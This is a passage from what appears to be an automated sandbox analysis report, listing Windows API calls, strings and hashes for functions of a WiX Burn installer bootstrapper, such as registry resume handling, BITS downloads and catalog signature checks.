                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000,?,?,00020006,00000000,00401414,00000001), ref: 0040B423
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00000000,00000000,00000000,?,?,00020006,00000000,00401414,00000001), ref: 0040B430
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0040B346
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040B461
                                                                                                                                                                  • Failed to write volatile reboot required registry key., xrefs: 0040B370
                                                                                                                                                                  • Failed to update resume mode., xrefs: 0040B408
                                                                                                                                                                  • Failed to delete registration key: %ls, xrefs: 0040B3D2
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to delete registration key: %ls$Failed to open registration key.$Failed to update resume mode.$Failed to write volatile reboot required registry key.
                                                                                                                                                                  • API String ID: 3535843008-2517785395
                                                                                                                                                                  • Opcode ID: d958354166063fd9082e3b373f56b229dab8a3801a4dfd616c3118c500a88bf7
                                                                                                                                                                  • Instruction ID: cbef5d51cf136f906b777c30e3e8c22d283489d28ec1a1f4cc3a22e0214a8707
                                                                                                                                                                  • Opcode Fuzzy Hash: d958354166063fd9082e3b373f56b229dab8a3801a4dfd616c3118c500a88bf7
                                                                                                                                                                  • Instruction Fuzzy Hash: DD418E36900218FBCF11AFA19C41D9FBBB9EF44308F20843FF90572192D7799A509B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,00000000,00000000,000000F8,00000100,?,00000000,?), ref: 0040A75F
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,00000000,00000000,000000F8,00000100,?,00000000,?), ref: 0040A76C
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls.RebootRequired, xrefs: 0040A64E
                                                                                                                                                                  • Failed to open registration key., xrefs: 0040A6CB
                                                                                                                                                                  • Failed to format pending restart registry key to read., xrefs: 0040A66E
                                                                                                                                                                  • Resume, xrefs: 0040A6D6
                                                                                                                                                                  • Failed to read Resume value., xrefs: 0040A6F8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Close
                                                                                                                                                                  • String ID: %ls.RebootRequired$Failed to format pending restart registry key to read.$Failed to open registration key.$Failed to read Resume value.$Resume
                                                                                                                                                                  • API String ID: 3535843008-3890505273
                                                                                                                                                                  • Opcode ID: 4ee1fe4a0767466e797e8ed133812321f1d3276df81f63fbd81463be14d9f030
                                                                                                                                                                  • Instruction ID: 59c0d1a5aa3fce75bcb8150df50c79763769077d3801cecda617ebec4de6cd86
                                                                                                                                                                  • Opcode Fuzzy Hash: 4ee1fe4a0767466e797e8ed133812321f1d3276df81f63fbd81463be14d9f030
                                                                                                                                                                  • Instruction Fuzzy Hash: 94418235900318EFCB11AF94C980AAEBBB4FB04314F258177E914B7290D37DEE619B5A
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to determine length of relative path.$Failed to determine length of source path.$Failed to set last source.$Failed to trim source folder.$WixBundleLastUsedSource
                                                                                                                                                                  • API String ID: 0-660234312
                                                                                                                                                                  • Opcode ID: cbcb56998c28ac9479d5fd0666458dfcf87b496e03f093fa7cbe70e74e16f28a
                                                                                                                                                                  • Instruction ID: cc6e89eb5fc584fe961a28a5ee14ae26f0cd037ddf2c19b67e5aeb0f85a03fd2
                                                                                                                                                                  • Opcode Fuzzy Hash: cbcb56998c28ac9479d5fd0666458dfcf87b496e03f093fa7cbe70e74e16f28a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5631CD32900129BBDF119B94CC49FDFBAB9AB94720F21026BF520B71D0D7789EC18798
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add the package provider key "%ls" to the list of ignored dependencies., xrefs: 0041E3F5
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041E3CB, 0041E3D0, 0041E3E7
                                                                                                                                                                  • Failed to get the package property: %ls, xrefs: 0041E3E8
                                                                                                                                                                  • Failed to add the bundle provider key "%ls" to the list of ignored dependencies., xrefs: 0041E397
                                                                                                                                                                  • Failed to create the string dictionary., xrefs: 0041E36E
                                                                                                                                                                  • Failed to add the provider key "%ls" to the list of ignored dependencies., xrefs: 0041E434
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Failed to add the bundle provider key "%ls" to the list of ignored dependencies.$Failed to add the package provider key "%ls" to the list of ignored dependencies.$Failed to add the provider key "%ls" to the list of ignored dependencies.$Failed to create the string dictionary.$Failed to get the package property: %ls$IGNOREDEPENDENCIES
                                                                                                                                                                  • API String ID: 0-1284964865
                                                                                                                                                                  • Opcode ID: b1026fa22fa066d66e4373e3737e1f82d51fb4507716d07f94081ec64e103e6f
                                                                                                                                                                  • Instruction ID: a31163e25ac7690412e7e155a0dc527f041943885925f6b9b87a44ca6eab7078
                                                                                                                                                                  • Opcode Fuzzy Hash: b1026fa22fa066d66e4373e3737e1f82d51fb4507716d07f94081ec64e103e6f
                                                                                                                                                                  • Instruction Fuzzy Hash: 6E31E33A900124BBDB129E52CC41FEE77A9EF44724F15406BFD10AB211D73DDD819799
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CoCreateInstance.OLE32(0044E498,00000000,00000017,0044E4A8,?,?,00000000,00000000,?,?,?,?,?,004264A9,00000000,00000000), ref: 00425F55
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set notification flags for BITS job., xrefs: 00425F9F
                                                                                                                                                                  • Failed to create BITS job., xrefs: 00425F87
                                                                                                                                                                  • Failed to set BITS job to foreground., xrefs: 00425FCE
                                                                                                                                                                  • Failed to create IBackgroundCopyManager., xrefs: 00425F61
                                                                                                                                                                  • Failed to set progress timeout., xrefs: 00425FB7
                                                                                                                                                                  • WixBurn, xrefs: 00425F78
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateInstance
                                                                                                                                                                  • String ID: Failed to create BITS job.$Failed to create IBackgroundCopyManager.$Failed to set BITS job to foreground.$Failed to set notification flags for BITS job.$Failed to set progress timeout.$WixBurn
                                                                                                                                                                  • API String ID: 542301482-468763447
                                                                                                                                                                  • Opcode ID: 7c419a63f170951291ef6eb948459f02e3c8a27f16b619eb7da85ce86f95f855
                                                                                                                                                                  • Instruction ID: 906077f7369b0878c4c8525a5927c5930a58fe9102b61d985817ee0e2025b8ce
                                                                                                                                                                  • Opcode Fuzzy Hash: 7c419a63f170951291ef6eb948459f02e3c8a27f16b619eb7da85ce86f95f855
                                                                                                                                                                  • Instruction Fuzzy Hash: 6D31E531F00625AFDB14CFA9D845E6FBBB4AF48710B51002AF901EB380C678EC018B99
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00407F4A: CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,004094E8,000000FF,00000000,00000000,004094E8,?,?,00408D91,?,?,?,?), ref: 00407F75
                                                                                                                                                                  • CreateFileW.KERNEL32(EB0043B6,80000000,00000005,00000000,00000003,08000000,00000000,00401DE7,880FF685,00000000,004021A7,54680779,00402283,00401DDF,00000000,00401EAB), ref: 00407B23
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,0041173E,00402077,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?,00401DDF,00401DDF,?), ref: 00407B68
                                                                                                                                                                    • Part of subcall function 004141E9: WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414276
                                                                                                                                                                    • Part of subcall function 004141E9: WinVerifyTrust.WINTRUST(000000FF,00AAC56B,?,000000FF,00AAC56B,?,00401DDF,00000000,00401F17,?,00401E27,?), ref: 00414290
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to open catalog in working path: %ls, xrefs: 00407B99
                                                                                                                                                                  • catalog.cpp, xrefs: 00407B8C
                                                                                                                                                                  • Failed to get catalog local file path, xrefs: 00407BA9
                                                                                                                                                                  • Failed to verify catalog signature: %ls, xrefs: 00407B61
                                                                                                                                                                  • Failed to find payload for catalog file., xrefs: 00407BB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: TrustVerify$CompareCreateErrorFileLastString
                                                                                                                                                                  • String ID: Failed to find payload for catalog file.$Failed to get catalog local file path$Failed to open catalog in working path: %ls$Failed to verify catalog signature: %ls$catalog.cpp
                                                                                                                                                                  • API String ID: 357250294-48089280
                                                                                                                                                                  • Opcode ID: d6f3c312d51c711c4a02911773639bf5ec82e7ddc59dfbcadc24a8472dfb164e
                                                                                                                                                                  • Instruction ID: 59e80f1c8acc56c316be8387aa7f63210370a6748d252063ee5d119d3167a94f
                                                                                                                                                                  • Opcode Fuzzy Hash: d6f3c312d51c711c4a02911773639bf5ec82e7ddc59dfbcadc24a8472dfb164e
                                                                                                                                                                  • Instruction Fuzzy Hash: 9D31A431E00611BFDB11AB65CC41F5ABAA4EF08714F208267F904BB2D0E778FA518BD9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateProcessW.KERNEL32 ref: 00431F3B
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00431F45
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00431F8E
                                                                                                                                                                  • CloseHandle.KERNEL32(0040F65B,?,?,?,?,00000000,00000000,00000000), ref: 00431F9B
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateErrorLastProcess
                                                                                                                                                                  • String ID: "%ls" %ls$D$procutil.cpp
                                                                                                                                                                  • API String ID: 161867955-2732225242
                                                                                                                                                                  • Opcode ID: 149410421210a28da9ca9e371d5b379d2e4a5cd14a93d9700b06125f10d978cf
                                                                                                                                                                  • Instruction ID: 88aacfed63ba10e08a9080e8e171d346880dde1cde18685404fa2e2fc74ddf50
                                                                                                                                                                  • Opcode Fuzzy Hash: 149410421210a28da9ca9e371d5b379d2e4a5cd14a93d9700b06125f10d978cf
                                                                                                                                                                  • Instruction Fuzzy Hash: 2A212D71A0021DAFDB11DFE5CD41AAFB7B8EF08355F10542AEA01B7260D3789E009BA5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405C1B
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,00000000,?,0040689F,000000F8,000000F8,000002A8,000000F8), ref: 00405C30
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040689F,000000F8,000000F8,000002A8,000000F8), ref: 00405C3B
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to set directory search path variable., xrefs: 00405C6B
                                                                                                                                                                  • Directory search: %ls, did not find path: %ls, reason: 0x%x, xrefs: 00405CAE
                                                                                                                                                                  • Failed while searching directory search: %ls, for path: %ls, xrefs: 00405C98
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405C26
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Directory search: %ls, did not find path: %ls, reason: 0x%x$Failed to format variable string.$Failed to set directory search path variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                  • API String ID: 1811509786-2966038646
                                                                                                                                                                  • Opcode ID: 3a2f506a79031533fb714ec33e04de99a0c8e64e1b17238e4e5255e6e35a4a5c
                                                                                                                                                                  • Instruction ID: 8ee04f2290911e4e7c9f80f11c7c4f7d31bed2b1113de2c3b44c2261c9a2fef0
                                                                                                                                                                  • Opcode Fuzzy Hash: 3a2f506a79031533fb714ec33e04de99a0c8e64e1b17238e4e5255e6e35a4a5c
                                                                                                                                                                  • Instruction Fuzzy Hash: 3721C532904724B7EB1266949D06B9FBA65EF14320F21423BF902B61E0E73D5E10AEDD
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,00000000,?,?), ref: 0040F5F5
                                                                                                                                                                    • Part of subcall function 00431C19: GetModuleFileNameW.KERNEL32(r@,?,00000104,?,00000104,?,00000000,00401C5F,?,004072ED,?,00000000,?,?,?,00401C5F), ref: 00431C3A
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0040F67A
                                                                                                                                                                    • Part of subcall function 00431ECE: CreateProcessW.KERNEL32 ref: 00431F3B
                                                                                                                                                                    • Part of subcall function 00431ECE: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00431F45
                                                                                                                                                                    • Part of subcall function 00431ECE: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00431F8E
                                                                                                                                                                    • Part of subcall function 00431ECE: CloseHandle.KERNEL32(0040F65B,?,?,?,?,00000000,00000000,00000000), ref: 00431F9B
                                                                                                                                                                  Strings
                                                                                                                                                                  • %ls -%ls %ls %ls %u, xrefs: 0040F626
                                                                                                                                                                  • Failed to get current process path., xrefs: 0040F60D
                                                                                                                                                                  • burn.unelevated, xrefs: 0040F61E
                                                                                                                                                                  • Failed to allocate parameters for elevated process., xrefs: 0040F63A
                                                                                                                                                                  • Failed to launch parent process with unelevate disabled: %ls, xrefs: 0040F664
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$Process$CreateCurrentErrorFileLastModuleName
                                                                                                                                                                  • String ID: %ls -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to get current process path.$Failed to launch parent process with unelevate disabled: %ls$burn.unelevated
                                                                                                                                                                  • API String ID: 104269755-688900554
                                                                                                                                                                  • Opcode ID: 8cc345923506d004e62728c6cafead8a060e814c970353ec67c058b8f9e28932
                                                                                                                                                                  • Instruction ID: caa3efeb91e7c7fc6da20c5dcd3557f38c843eb2389afac2f9818e404911b926
                                                                                                                                                                  • Opcode Fuzzy Hash: 8cc345923506d004e62728c6cafead8a060e814c970353ec67c058b8f9e28932
                                                                                                                                                                  • Instruction Fuzzy Hash: 67216F32D00219FBCF21AFE1DC4199EBB78EF14715F10557BF900B2261D73A8A569B98
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • _MREFOpen@16.MSPDB140-MSVCRT ref: 00405DD5
                                                                                                                                                                  • GetFileAttributesW.KERNEL32(00000000,000002A8,?,00000000,00000000,000000F8,000000F8,000002D0,?,0040687B,000000F8,000000F8,000000F8,?,000000F8,000000F8), ref: 00405DEA
                                                                                                                                                                  • GetLastError.KERNEL32(?,0040687B,000000F8,000000F8,000000F8,?,000000F8,000000F8,000000F8,000002A8,000000F8), ref: 00405DF5
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed while searching file search: %ls, for path: %ls, xrefs: 00405E22
                                                                                                                                                                  • File search: %ls, did not find path: %ls, xrefs: 00405E60
                                                                                                                                                                  • Failed to set variable to file search path., xrefs: 00405E4C
                                                                                                                                                                  • Failed to format variable string., xrefs: 00405DE0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                  • String ID: Failed to format variable string.$Failed to set variable to file search path.$Failed while searching file search: %ls, for path: %ls$File search: %ls, did not find path: %ls
                                                                                                                                                                  • API String ID: 1811509786-3425311760
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79), ref: 00416014
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 0041601E
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,?,?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?), ref: 0041605A
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00416419,00000000,00000000,?,0041596E,?,00000000,?,?,?,00401E79,?,?,?), ref: 00416064
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$elevation.cpp
                                                                                                                                                                  • API String ID: 3686190907-1954264426
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000001,000000FF,00000000,?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BAE
                                                                                                                                                                  • GetLastError.KERNEL32(?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BB8
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(00000001,00000000,?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410BF7
                                                                                                                                                                  • GetLastError.KERNEL32(?,00410F49,00401414,00000088,00000000,00000000,000000B8,00000001), ref: 00410C01
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeExitObjectSingleThreadWait
                                                                                                                                                                  • String ID: Failed to get cache thread exit code.$Failed to wait for cache thread to terminate.$core.cpp
                                                                                                                                                                  • API String ID: 3686190907-2546940223
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(?), ref: 00418473
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 00418580
                                                                                                                                                                  Strings
                                                                                                                                                                  • UX requested unknown container with id: %ls, xrefs: 0041853F
                                                                                                                                                                  • Failed to set source path for container., xrefs: 00418565
                                                                                                                                                                  • UX requested unknown payload with id: %ls, xrefs: 004184DF
                                                                                                                                                                  • Engine is active, cannot change engine state., xrefs: 0041848D
                                                                                                                                                                  • Failed to set source path for payload., xrefs: 0041850F
                                                                                                                                                                  • UX denied while trying to set source on embedded payload: %ls, xrefs: 004184F5
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                  • String ID: Engine is active, cannot change engine state.$Failed to set source path for container.$Failed to set source path for payload.$UX denied while trying to set source on embedded payload: %ls$UX requested unknown container with id: %ls$UX requested unknown payload with id: %ls
                                                                                                                                                                  • API String ID: 3168844106-4121889706
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateDirectoryW.KERNEL32(0040227F,00000000,?,?,?,?,004021A7,00401F17), ref: 004315A7
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,004021A7,00401F17), ref: 004315B5
                                                                                                                                                                  • GetTempPathW.KERNEL32(00000104,00000000,00000000,00000104,00401DDF,00000000,?,?,?,004087AC,00000000,.ba%d,000F423F,004021A7,00401F17,00000000), ref: 004315EB
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,004087AC,00000000,.ba%d,000F423F,004021A7,00401F17,00000000,00000000,?,?,004116FD,00FFFFFD,00401EAB), ref: 004315F9
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CreateDirectoryPathTemp
                                                                                                                                                                  • String ID: %s%s$pathutil.cpp
                                                                                                                                                                  • API String ID: 2804724334-3961969462
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000001,00000000,00000000), ref: 00430B58
                                                                                                                                                                  • GetComputerNameW.KERNEL32 ref: 00430BB0
                                                                                                                                                                  Strings
                                                                                                                                                                  • Computer : %ls, xrefs: 00430C1C
                                                                                                                                                                  • === Logging started: %ls ===, xrefs: 00430BD9
                                                                                                                                                                  • Executable: %ls v%d.%d.%d.%d, xrefs: 00430C0A
                                                                                                                                                                  • --- logging level: %hs ---, xrefs: 00430C66
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Name$ComputerFileModule
                                                                                                                                                                  • String ID: --- logging level: %hs ---$=== Logging started: %ls ===$Computer : %ls$Executable: %ls v%d.%d.%d.%d
                                                                                                                                                                  • API String ID: 2577110986-3153207428
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,?,AX@,00404E31,AX@,?,?,?,?,?,?,00405841,?), ref: 00404CEA
                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,?,?,AX@,00404E31,AX@,?,?,?,?,?,?,00405841,?), ref: 00404CF2
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404D41
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404D9F
                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,?,?,AX@,00404E31,AX@,?,?,?), ref: 00404DCC
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                  • String ID: AX@
                                                                                                                                                                  • API String ID: 1657112622-2326243369
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  APIs
                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00457E88,00000000,0000000D,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000,Setup), ref: 00430D43
                                                                                                                                                                  • CreateFileW.KERNEL32(40000000,00000001,00000000,00000002,00000080,00000000,?,00000000,?,00000001,?,00457E80,?,?,0040E699,?), ref: 00430DE4
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000,Setup,00000000,log,0000000D), ref: 00430DF4
                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000), ref: 00430E2D
                                                                                                                                                                    • Part of subcall function 0043167E: GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 004317BD
                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00457E88,00000001,?,00457E80,?,?,0040E699,?,?,00000000,?,00000000,00000000,0000000D,?,00000000), ref: 00430E86
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalFileSection$CreateEnterErrorLastLeaveLocalPointerTime
                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                  • API String ID: 4111229724-3545173039
                                                                                                                                                                  Uniqueness

